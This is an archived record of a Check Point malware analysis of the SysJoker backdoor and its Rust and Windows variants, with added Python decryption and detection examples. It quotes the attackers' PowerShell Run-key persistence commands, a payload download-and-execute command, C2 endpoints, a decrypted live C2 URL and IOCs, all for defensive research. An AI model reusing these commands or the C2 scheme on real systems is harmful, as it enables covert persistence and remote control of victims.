{
	"id": "db7224ca-dced-4aff-8474-e130b7326d58",
	"created_at": "2026-04-10T03:20:27.883436Z",
	"updated_at": "2026-04-10T13:11:55.813367Z",
	"deleted_at": null,
	"sha1_hash": "ce88544b8559846a62eac4ab406aeef2c9ddff50",
	"title": "Israel-Hamas War Spotlight: Shaking the Rust Off SysJoker",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 132536,
	"plain_text": "Israel-Hamas War Spotlight: Shaking the Rust Off SysJoker\r\nBy etal\r\nPublished: 2023-11-23 · Archived: 2026-04-10 02:40:32 UTC\r\nKey Findings\r\nCheck Point Research is actively tracking the evolution of SysJoker, a previously publicly unattributed multi-platform backdoor, which we assess was used by a Hamas-affiliated APT to target Israel.\r\nAmong the most prominent changes is the shift to the Rust language, which indicates the malware code was entirely rewritten while maintaining similar functionality. In addition, the threat actor moved from Google Drive to OneDrive to store dynamic C2 (command and control server) URLs.\r\nAnalysis of newly discovered variants of SysJoker revealed ties to previously undisclosed samples of Operation Electric Powder, a set of targeted attacks against Israeli organizations between 2016 and 2017 that were loosely linked to the threat actor known as Gaza Cybergang.\r\nIntroduction\r\nAmid tensions in the ongoing Israel-Hamas war, Check Point Research has been conducting active threat hunting in an effort to discover, attribute, and mitigate relevant regional threats. Among those, some new variants of the SysJoker malware, including one coded in Rust, recently caught our attention. Our assessment is that these were used in targeted attacks by a Hamas-related threat actor.\r\nSysJoker, initially discovered by Intezer in 2021, is a multi-platform backdoor with variants for Windows, Linux and Mac. The same malware was also analyzed in another report a few months after the original publication. Since then, the SysJoker Windows variants have evolved enough to stay under the radar.\r\nAs we investigated the newer variants of SysJoker used in targeted attacks in 2023, we also discovered a variant written in Rust, which suggests the malware code was completely rewritten. In addition, we uncovered behavioral similarities with another campaign, Operation Electric Powder, which targeted Israel in 2016-2017. That campaign was previously linked to Gaza Cybergang (aka Molerats), a threat actor operating in conjunction with Palestinian interests.\r\nIn this article, we drill down into the Rust version of SysJoker and disclose additional information on other SysJoker Windows variants and their attribution.\r\nRust SysJoker Variant\r\nThe SysJoker variant (9416d7dc2ecdeda92ba35cd5e54eb044), written in Rust, was submitted to VirusTotal under the name php-cgi.exe on October 12, 2023. Compiled a few months earlier, on August 7, it contains the following PDB path: C:\\Code\\Rust\\RustDown-Belal\\target\\release\\deps\\RustDown.pdb\r\nThe malware sleeps for random intervals at various stages of its execution, which may serve as an anti-sandbox or anti-analysis measure.\r\nThe sample has two modes of operation, selected by whether it is running from a particular path. This distinguishes the first execution from subsequent ones launched through persistence.\r\nFirst, it checks whether the path of the currently running module matches C:\\ProgramData\\php-7.4.19-Win32-vc15-x64\\php-cgi.exe. Based on the outcome, the malware proceeds to one of two possible stages.\r\nFirst execution\r\nIf the sample runs from a different location, indicating that this is its first execution, the malware copies itself to C:\\ProgramData\\php-7.4.19-Win32-vc15-x64\\php-cgi.exe and then launches the copy from the new path using PowerShell with the following parameter:\r\n-Command C:\\ProgramData\\php-7.4.19-Win32-vc15-x64\\php-cgi.exe\r\nhttps://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/\r\nPage 1 of 10\r\nFinally, it creates a persistence mechanism and then exits.\r\nPersistence is established in an unusual way, using PowerShell with the following argument:\r\n-Command \"$reg=[WMIClass]'ROOT\\DEFAULT:StdRegProv'; $results=$reg.SetStringValue('\u0026H80000001','Software\\Microsoft\\Windows\\CurrentVersion\\Run', 'php-cgi', 'C:\\ProgramData\\php-7.4.19-Win32-vc15-x64\\php-cgi.exe');\"\r\nThis PowerShell code creates a Run value under the HKEY_CURRENT_USER hive (the first argument, \u0026H80000001, is the VBScript-style hex literal for the HKEY_CURRENT_USER handle 0x80000001) that points to the copied executable. It does so through the WMI StdRegProv class rather than by accessing the registry directly via the Windows API or reg.exe.\r\nSubsequent executions (from persistence)\r\nSysJoker contacts a URL on OneDrive to retrieve the C2 server address. The URL is hardcoded and encrypted inside the binary:\r\nhttps://onedrive.live[.]com/download?resid=16E2AEE4B7A8BBB1%21112\u0026authkey=!AED7TeCJaC7JNVQ\r\nThe response contains an XOR-encrypted blob of data encoded in base64. During our investigation, the following response was received:\r\nKnM5Sjpob2glNTY8AmcaYXt8cAh/fHZ+ZnUNcwdld2Mr\r\nAfter base64 decoding and XOR decryption, the C2 IP address and port are revealed:\r\n{\"url\":\"http://85.31.231[.]49:443\"}\r\nUsing OneDrive allows the attackers to change the C2 address easily, which helps them stay ahead of reputation-based services. This behavior remains consistent across different versions of SysJoker.\r\nThe malware collects information about the infected system, including the Windows version, username, MAC address, and various other data. 
This information is then sent to the /api/attach API endpoint on the C2 server, and in response the malware receives a unique token that serves as its identifier in subsequent communication with the C2:\r\nFigure 1 – Bot registration API call.\r\nAfter registering with the C2 server, the sample enters the main C2 loop. It sends a POST request containing the unique token to the /api/req endpoint, and the C2 responds with JSON data:\r\nFigure 2 – Command request and response.\r\nThe expected response from the server is a JSON object with a field named data that contains an array of actions for the sample to execute. Each array element consists of id and request fields. The request field is itself a JSON document with fields called url and name. An example of the response from the server:\r\n{\"data\":[{\"id\":\"1\", \"request\":\"{\"url\": \"http://85.31.231[.]49/archive_path\", \"name\":\"mal_1.exe\"}\"}, {\"id\":\"2\", \"request\":\"{\"url\": \"http://85.31.231[.]49/archive_path\", \"name\":\"mal_2.exe\"}\"}]}\r\nThe malware downloads a zip archive from the URL specified in the url field. The archive contains an executable which, after unzipping, is saved under the name given in the name field into the C:\\ProgramData\\php-Win32-libs folder. The archive is unzipped and the executable launched using the following PowerShell command:\r\npowershell -Command Expand-Archive -Path C:\\ProgramData\\php-Win32-libs\\XMfmF.zip -DestinationPath C:\\ProgramData\\php-Win32-libs ; start C:\\ProgramData\\php-Win32-libs\\exe_name.exe\r\nIt is important to mention that in previous SysJoker operations, the malware could not only download and execute remote files from an archive but also execute commands dictated by the operators. This functionality is missing in the Rust version. After receiving and executing the file download command, the malware contacts the C2 server again and, depending on whether the operation succeeded, sends a success or exception message to the path /api/req/res. The server sends back a JSON confirmation indicating that it has received the information: {\"status\":\"success\"}.\r\nEncryption\r\nThe malware has two methods for string decryption. The first is simple and appears across multiple SysJoker variants. The sample contains several base64-encoded encrypted data blobs and a base64-encoded key. To decrypt, both the blob and the key are base64-decoded and then XORed together to produce the plaintext string.\r\nThe second method is tedious and is spliced inline throughout the program repeatedly at compile time. This generates a complex string decryption algorithm throughout the sample.\r\nFigure 3 – Example of the decryption of the string “php-”.\r\nWindows SysJoker Variants\r\nIn addition to the newly found Rust variant, we uncovered two more SysJoker samples that were not publicly exposed in the past. Both are slightly more complex than the Rust version or any of the previously analyzed samples, possibly due to the public discovery and analysis of the malware. One of them, in contrast to other versions, has a multi-stage execution flow consisting of a downloader, an installer, and a separate payload DLL.\r\nDMADevice variant\r\nThe DMADevice sample (d51e617fe1c1962801ad5332163717bb) was compiled in May 2022, a few months after SysJoker was first uncovered.\r\nLike other versions, the malware starts by retrieving the C2 server address by contacting the URL:\r\nhttps://onedrive.live[.]com/download?cid=F6A7DCE38A4B8570\u0026resid=F6A7DCE38A4B8570!115\u0026authkey=AKcf8zLcDneJZHw\r\nThe OneDrive link responds with an encrypted, base64-encoded string, which is decrypted with the XOR key QQL8VJUJMABL8H5YNRC9QNEOHA4I3QDAVWP5RY9L0HCGWZ4T7GTYQTCQTHTTN8RV6BMKT3AICZHOFQS8MTT. 
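The first decryption method is simple enough to reproduce end to end. The following Python is an added example written for this page, not code from Check Point or from the malware: it base64-decodes a blob and XORs it with the key, and applies that to the OneDrive response quoted above for the Rust variant, which the report says uses this same key. It also handles the DMADevice /api/cc reply described below, whose own key field is the XOR key for its pi and data fields. Repeating the key for blobs longer than the key, and the encrypt helper used to build a constructed /api/cc reply, are assumptions of the example; every blob the report shows is shorter than the key.\r\n

```python
import base64
import json

# XOR key the report quotes for the DMADevice variant and says is shared with
# the Rust variant (used as raw ASCII bytes, not base64-decoded again).
SYSJOKER_XOR_KEY = b'QQL8VJUJMABL8H5YNRC9QNEOHA4I3QDAVWP5RY9L0HCGWZ4T7GTYQTCQTHTTN8RV6BMKT3AICZHOFQS8MTT'

# Body the report says the Rust variant's OneDrive URL returned.
RUST_VARIANT_ONEDRIVE_RESPONSE = 'KnM5Sjpob2glNTY8AmcaYXt8cAh/fHZ+ZnUNcwdld2Mr'


def xor_bytes(data: bytes, key: bytes) -> bytes:
    '''XOR data with key. Repeating the key for inputs longer than the key is an
    assumption of this example; every blob the report shows is shorter than it.'''
    if not key:
        raise ValueError('empty XOR key')
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def xor_b64_decrypt(blob_b64: str, key: bytes) -> bytes:
    '''The first SysJoker string-decryption method: base64-decode, then XOR.'''
    return xor_bytes(base64.b64decode(blob_b64), key)


def xor_b64_encrypt(plaintext: bytes, key: bytes) -> str:
    '''Inverse of xor_b64_decrypt, used here only to build constructed inputs.'''
    return base64.b64encode(xor_bytes(plaintext, key)).decode('ascii')


def decode_c2_config(blob_b64: str, key: bytes = SYSJOKER_XOR_KEY) -> dict:
    '''Decrypt a OneDrive response and return the parsed {url: ...} object.
    A wrong key almost always yields non-UTF-8 or non-JSON bytes, so the
    parse failure doubles as the key check.'''
    plaintext = xor_b64_decrypt(blob_b64, key)
    try:
        config = json.loads(plaintext.decode('utf-8'))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError(f'not a SysJoker config (wrong key?): {plaintext[:16]!r}') from exc
    if not isinstance(config, dict) or 'url' not in config:
        raise ValueError('decrypted JSON has no url field')
    return config


def decode_dmadevice_cc_response(response_json: str) -> dict:
    '''For the DMADevice /api/cc reply, the key field of the JSON is itself the
    XOR key for the other fields (pi = victim IP, data = setup string array).'''
    reply = json.loads(response_json)
    key = reply['key'].encode('utf-8')
    return {field: xor_b64_decrypt(reply[field], key).decode('utf-8')
            for field in ('pi', 'data') if field in reply}


if __name__ == '__main__':
    print(decode_c2_config(RUST_VARIANT_ONEDRIVE_RESPONSE))
    # Constructed /api/cc reply (not from the report) to exercise the per-reply key;
    # the key value is the one shown in the report's /api/cc example.
    demo_key = 'f57d611b-0779-4125-a3e8-4f8ca3116509'
    demo_reply = json.dumps({
        'key': demo_key,
        'pi': xor_b64_encrypt(b'10.0.0.5', demo_key.encode()),
        'data': xor_b64_encrypt(json.dumps(['SystemDrive', 'ProgramData']).encode(), demo_key.encode()),
    })
    print(decode_dmadevice_cc_response(demo_reply))
```

Run directly, the first line printed is {'url': 'http://85.31.231.49:443'}, the C2 the report shows defanged as 85.31.231[.]49:443. Because the report states that the DMADevice config file DMASolutionInc.dll is stored base64-encoded and XOR-encrypted with this same key, xor_b64_decrypt with SYSJOKER_XOR_KEY also recovers its id/us/ip JSON from a copy taken off disk.\r\n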
This is the same key that is used in the Rust version.\r\nThe decrypted blob contains a JSON object with the C2 domain in the following format:\r\n{\"url\":\"http://sharing-u-file[.]com\"}\r\nNext, the malware proceeds to a three-stage execution process.\r\n1. Setup files and persistence\r\nThe sample generates a unique bot ID, sends it in a POST request to the /api/cc API endpoint, and receives back a JSON describing the desired malware setup on the infected machine.\r\nThe JSON has the following structure:\r\n{\"key\":\"f57d611b-0779-4125-a3e8-4f8ca3116509\",\"pi\":\"VwUD[REDACTED]\",\"data\":\"PRdkHUVFVA9pQl5BXA8YE2JHQgZBBFVpVRJZQU0RdXx3cVVPD1ZSRhoTdS9sY1hbTFldX[TRUNCATED]\r\nThe key field of the JSON is used to XOR-decrypt the other fields after they are base64-decoded: the pi field contains the victim’s IP address and the data field contains an array with multiple values:\r\n[\"SystemDrive\",\"ProgramData\",\"DMADevice\",\"DMASolutionInc\",\"DMASolutionInc.exe\",\"DMASolutionInc.dll\",\"powershell.exe\",\"cmd\",\"open\",\"start\",\"REG ADD HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run \\/V\",\"\\/t REG_SZ \\/D\",\".exe\",\"$env:username | Out-File -Encoding 'utf8' '\",\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\"]\r\nThese values are used in the following order:\r\nSystemDrive – Get the system drive letter.\r\nProgramData – Create the following two folders under the specified (in this case, ProgramData) folder:\r\n– DMADevice – The first folder name created.\r\n– DMASolutionInc.exe – The file name under which the currently running executable copies itself into the DMADevice folder.\r\nDMASolutionInc.dll – The name of the config file.\r\nDMASolutionInc – The second folder name created.\r\nThe rest of the values are used in a few commands that establish persistence via the registry Run key and write the current user name from $env:username into a temporary txt file.\r\nThe config file, in our case DMASolutionInc.dll, is stored on disk encrypted (using the same key used to decrypt the domain) and base64-encoded. It contains encrypted JSON with the following fields:\r\n{\"id\":\"[BOT-ID]\",\"us\":\"[USERNAME]\",\"ip\":\"[IP]\"}\r\nAfter performing all these operations, the sample executes its copy from DMASolutionInc.exe and exits.\r\n2. Register with the C2 server\r\nWhen the sample is executed again (via the persistence established in the previous stage), it checks the location it is running from. It then continues by making a POST request to /api/add containing the uuid, user name, and user token, which is also generated by the malware:\r\nuuid=bot-id\u0026nu=username\u0026user_token=token\r\nThe server responds with a token generated on its side, which is then used for all subsequent C2 requests.\r\n3. C2 main loop\r\nThe token received during the previous stage is used for making POST requests to /api/cr on the C2 server to retrieve the commands to execute.\r\nSimilar to other SysJoker variants, the server responds with a JSON containing a field data, which is an array of actions to take. This version can download and execute files or run commands and upload the results to the C2 server. For each command in the array, the sample sends a response reporting whether it was successful.\r\nAppMessagingRegistrar variant\r\nThis variant has a compilation timestamp of June 2022 and a quite different execution flow. The functionality of the malware is divided into two separate components: a downloader (DDN, c2848b4e34b45e095bd8e764ca1a4fdd) and a backdoor (AppMessagingRegistrar, 31c2813c1fb1e42b85014b2fc3fe0666).\r\nDDN Downloader\r\nThe threat actors first deliver a lightweight downloader. It creates the folder C:\\ProgramData\\NuGet Library\\, then downloads a zip file from https://filestorage-short[.]org/drive/AppMessagingRegistrar.zip. 
It unzips the file, copies the result into AppMessagingRegistrar.exe and then executes it.\r\nSplitting the functionality into separate components has proved effective: at the time of the first submission to VirusTotal (VT), the malware was not detected by any of the platform’s engines:\r\nFigure 4 – DDN downloader with 0 detections on its first submission to VT (2023-04-09).\r\nAppMessagingRegistrar\r\nUpon execution, this payload first checks the registry key SOFTWARE\\Intel\\UNP\\ProgramUpdates\\UUID for the UUID of the PC. If the registry key is not available, a UUID is generated using the UuidCreate function and is then saved to the previously mentioned key.\r\nFigure 5 – UUID generation.\r\nThe variant then proceeds to decrypt a hardcoded OneDrive URL to retrieve a C2 address. The XOR key in this sample is 22GC18YH0N4RUE0BSJOAVW24624ULHIQGS4Y1BQQUZYTENJN2GBERQBFKF2W78H7.\r\nAfter the C2 address is decrypted, a POST request containing the previously generated UUID is made to the C2 server API endpoint /api/register.\r\nThe server responds with a JSON containing a token and a status message:\r\n{\"status\": \"success\", \"token\":\"[TOKEN]\", \"status_num\":1}\r\nThe status indicates whether the request was valid; the sample checks specifically for the string “success”.\r\nThe token is used for all the following C2 requests but, unlike all the other samples, it is sent in the Authorization header rather than in the request body: Authorization: Bearer [TOKEN]. This change may accommodate additional flows in the malware execution (discussed below) in which the malware sends a GET request instead of a POST and therefore needs a mechanism for the server to identify the sender.\r\nThe status_num field is used as a global flag that tells the bot which action to take. Four statuses are available (status number – action – description):\r\n0 – Setup – Download MsoftInit.dll and execute its init and step exports.\r\n1 – Idle loop – Wait for status_num to change.\r\n3 – Payload retrieval – Download and save the MsoftNotify.dll DLL.\r\n4 – Payload execution – Execute the MsoftNotify.dll DLL.\r\nSetup phase\r\nIf the received status_num is 0, the malware creates the C:\\ProgramData\\Intel\\UNP\\ProgramUpdates and C:\\ProgramData\\Intel\\Drivers\\MsoftUpdates folders. It then proceeds to:\r\n1. Download a DLL file using the function URLDownloadToFileW from the path /api/library/[TOKEN] and save it to C:\\ProgramData\\Intel\\Drivers\\MsoftUpdates\\MsoftInit.dll.\r\n2. Load MsoftInit.dll and call the init exported function.\r\n3. Load the same DLL again and call the step exported function.\r\nThe exact purpose of those functions is unknown, as we were not able to retrieve the DLL. However, given the names and our analysis of previous versions of the malware, we believe they are part of the persistence and setup process. Finally, the malware sends an empty POST request to the API endpoint /api/update. The expected response from the server is an empty JSON.\r\nIdle loop\r\nIf the status_num is 1, the malware keeps making requests to the C2 API endpoint /api/status in an infinite loop. To break the loop, the status_num must change.\r\nMain payload download\r\nIf the status_num is 3, the malware downloads a DLL file from the URL /api/library/[TOKEN] and saves it to the path C:\\ProgramData\\Intel\\Drivers\\MsoftUpdates\\MsoftNotify.dll. It then sends a request to the C2 API endpoint /api/ready: if the server responds with the status success, the status flag is set to 4.\r\nPayload execution\r\nIf the status is 4, the malware makes a GET request to the C2 API endpoint /api/requests. The C2 server responds with a JSON with three parameters: id, r, and k.\r\nThe malware then loads the MsoftNotify.dll DLL and resolves the function st. The r and k values sent from the server are passed to st as parameters. We were not able to retrieve the DLL, but based on the previous versions, this is likely a version of the main command-running functionality of the backdoor, and its return value should be a string. After the function runs and returns a result, the id received from the server is used in a POST request to the C2 that carries the output:\r\nPOST /api/requests/[ID] HTTP/1.1\r\nHost: 62.108.40[.]129\r\nAccept: application/json\r\nAuthorization: Bearer [TOKEN]\r\nContent-Length: 15\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nresponse=[EXECUTION OUTPUT]\r\n(In the original report the Host value links to the VirusTotal URL object https://www.virustotal.com/gui/url/79fde5d4b19cbd1f920535215c558b6ff63973b7af7d6bd488e256821711e0b1.)\r\nInfrastructure\r\nThe infrastructure used in this campaign is configured dynamically. First, the malware contacts a OneDrive address, and from there it decrypts the JSON containing the C2 address with which to communicate. The C2 address is encrypted with a hardcoded XOR key and base64-encoded.\r\nThis threat actor commonly uses cloud storage services. Previous reports show Google Drive was used for the same purpose.\r\nFigure 6 – Metadata of the OneDrive file containing the encrypted C2 server.\r\nTies to Operation Electric Powder\r\nThe SysJoker backdoor uses its own custom encryption for three main strings: the OneDrive URL containing the final C2 address, the C2 address received from the request to OneDrive, and a PowerShell command used for persistence:\r\n$reg=[WMIClass]'ROOT\\DEFAULT:StdRegProv'; $results=$reg.SetStringValue('\u0026H80000001','Software\\Microsoft\\Windows\\CurrentVersion\\Run'[TRUNCATED]\r\nThis PowerShell command based on the StdRegProv WMI class is quite unique. It is shared between multiple variants of SysJoker and otherwise appears in only one other campaign, associated with Operation Electric Powder, previously reported by ClearSky.\r\nThe 2017 report describes the persistent activity carried out in 2016-2017 against the Israel Electric Company (IEC). This operation used phishing and fake Facebook pages to deliver both Windows and Android malware.\r\n
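Because the report singles out this StdRegProv command as the artifact shared between the SysJoker variants and Electric Powder, it is a useful hunting pivot in process-creation telemetry (Sysmon event ID 1 or Windows Security event 4688 command lines). The following Python is an added example written for this page, not detection logic from Check Point or ClearSky: it checks a command line for the StdRegProv.SetStringValue pattern and for the plain REG ADD form that the DMADevice setup strings use, and runs over constructed sample command lines. The samples, the confidence labels and the HKCU heuristics are the example's own.\r\n

```python
from dataclasses import dataclass

# Registry path shared by both persistence styles, written with forward slashes
# because _normalize() folds backslashes to slashes before matching.
RUN_KEY = 'software/microsoft/windows/currentversion/run'
# VBScript-style hex literal for HKEY_CURRENT_USER (0x80000001), as passed to
# StdRegProv.SetStringValue in the command the report quotes.
HKCU_WMI_HANDLE = '&h80000001'


@dataclass
class Finding:
    technique: str
    confidence: str
    evidence: str


def _normalize(cmdline: str) -> str:
    # Fold case, collapse whitespace and turn backslashes into slashes so that
    # variations in quoting and path separators do not defeat the match.
    return ' '.join(cmdline.lower().replace(chr(92), '/').split())


def _hive(norm: str) -> str:
    # Heuristic of this example: the WMI handle literal or an HKCU path prefix.
    if HKCU_WMI_HANDLE in norm or 'hkcu/' in norm or 'hkey_current_user/' in norm:
        return 'HKCU'
    return 'other/unknown hive'


def inspect_command_line(cmdline: str) -> list:
    '''Return a Finding for each SysJoker-style Run-key persistence pattern in a
    process command line: StdRegProv via PowerShell (Rust variant, and per the
    report also Electric Powder) and REG ADD (DMADevice setup strings).
    Confidence labels are this example's own choices.'''
    norm = _normalize(cmdline)
    findings = []
    run_key = RUN_KEY in norm
    if 'stdregprov' in norm and 'setstringvalue' in norm:
        findings.append(Finding(
            technique='WMI StdRegProv.SetStringValue from PowerShell',
            confidence='high' if run_key else 'medium',
            evidence=f'{_hive(norm)}; targets Run key: {run_key}'))
    tokens = norm.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok in ('reg', 'reg.exe') and tokens[i + 1] == 'add' and run_key:
            findings.append(Finding(
                technique='reg.exe add to Run key',
                confidence='medium',
                evidence=f'{_hive(norm)}; ' + ' '.join(tokens[i:i + 3])))
            break
    return findings


# Constructed process-creation command lines (not taken from a real log).
# The first two are assembled from the commands and setup strings the report
# quotes; the rest are benign look-alikes that must not fire.
SAMPLE_COMMAND_LINES = [
    '''powershell -Command \"$reg=[WMIClass]'ROOT\\DEFAULT:StdRegProv'; $results=$reg.SetStringValue('&H80000001','Software\\Microsoft\\Windows\\CurrentVersion\\Run', 'php-cgi', 'C:\\ProgramData\\php-7.4.19-Win32-vc15-x64\\php-cgi.exe');\"''',
    'cmd /c REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V DMASolutionInc /t REG_SZ /D C:\\ProgramData\\DMADevice\\DMASolutionInc.exe',
    'powershell -Command Get-ItemProperty HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
    'reg add HKLM\\SOFTWARE\\Contoso\\Agent /v Port /t REG_DWORD /d 8443',
]


def scan(command_lines) -> dict:
    '''Map each offending command line to its findings; clean lines are omitted.'''
    return {c: f for c in command_lines if (f := inspect_command_line(c))}


if __name__ == '__main__':
    for cmd, found in scan(SAMPLE_COMMAND_LINES).items():
        for f in found:
            print(f'[{f.confidence}] {f.technique}: {f.evidence}')
```

The normalization folds case and path separators so the match survives quoting differences, but it is a substring check, not a parser: a one-liner that assembles the class name from fragments would pass it, so the rule belongs beside broader coverage of Run-key writes rather than replacing it.\r\n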
Windows malware used in this campaign consisted of a dropper, a main backdoor, and a Python-based keylogging and screen-grabbing module.\r\nThroughout our analysis of the SysJoker operation, we saw indications suggesting that the same actor is responsible for both attacks, despite the large time gap between the operations. Both campaigns used API-themed URLs and implemented script commands in a similar fashion. This includes the Run registry value but is not the only common factor. For example, the following image shows the similarities between the commands used by the different malware when gathering recon data from the infected device into temporary text files:\r\nFigure 7 – Use of the type command in Electric Powder → the original SysJoker → DMADevice SysJoker variant.\r\nConclusion\r\nAlthough the SysJoker malware, which was first seen in 2021 and publicly described in 2022, was not attributed to any known actor, we found evidence that this tool and its newer variants have been used as part of the Israel-Hamas conflict. We were also able to make a connection between SysJoker and the 2016-2017 Operation Electric Powder against the Israel Electric Company.\r\nIn this report, we described the evolution of the malware and the changes in the complexity of its execution flow, as well as its latest shift to the Rust language and the latest infrastructure it uses.\r\nThe earlier versions of the malware were coded in C++. Since there is no straightforward method to port that code to Rust, this suggests that the malware underwent a complete rewrite and may serve as a foundation for future changes and improvements.\r\nCheck Point Customers Remain Protected\r\nCheck Point customers remain protected against the attacks detailed in this report when using Check Point Anti-Bot, Harmony Endpoint and Threat Emulation.\r\nThreat Emulation\r\nBackdoor.Wins.Sysjoker.ta.R\r\nBackdoor.Wins.Sysjoker.ta.Q\r\nBackdoor.Wins.Sysjoker.ta.P\r\nBackdoor.Wins.Sysjoker.ta.O\r\nBackdoor.Wins.Sysjoker.ta.N\r\nBackdoor.Wins.Sysjoker.ta.M\r\nBackdoor.Wins.Sysjoker.ta.L\r\nHarmony Endpoint\r\nBackdoor.Win.SysJoker.H\r\nBackdoor_Linux_SysJoker_A/B/C/D/E/F\r\nCheck Point Anti-Bot\r\nBackdoor.WIN32.SysJoker.A\r\nBackdoor.WIN32.SysJoker.B\r\nBackdoor.WIN32.SysJoker.C\r\nIOCs\r\nInfrastructure\r\n85.31.231[.]49\r\nsharing-u-file[.]com\r\nfilestorage-short[.]org\r\naudiosound-visual[.]com\r\n62.108.40[.]129\r\nHashes\r\nd4095f8b2fd0e6deb605baa1530c32336298afd026afc0f41030fa43371e3e72\r\n6c8471e8c37e0a3d608184147f89d81d62f9442541a04d15d9ead0b3e0862d95\r\ne076e9893adb0c6d0c70cd7019a266d5fd02b429c01cfe51329b2318e9239836\r\n96dc31cf0f9e7e59b4e00627f9c7f7a8cac3b8f4338b27d713b0aaf6abacfe6f\r\n67ddd2af9a8ca3f92bda17bd990e0f3c4ab1d9bea47333fe31205eede8ecc706\r\n0ff6ff167c71b86c511c36cba8f75d1d5209710907a807667f97ce323df9c4ba\r\nSource: https://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/"
	],
	"report_names": [
		"israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker"
	],
	"threat_actors": [],
	"ts_created_at": 1775791227,
	"ts_updated_at": 1775826715,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ce88544b8559846a62eac4ab406aeef2c9ddff50.pdf",
		"text": "https://archive.orkl.eu/ce88544b8559846a62eac4ab406aeef2c9ddff50.txt",
		"img": "https://archive.orkl.eu/ce88544b8559846a62eac4ab406aeef2c9ddff50.jpg"
	}
}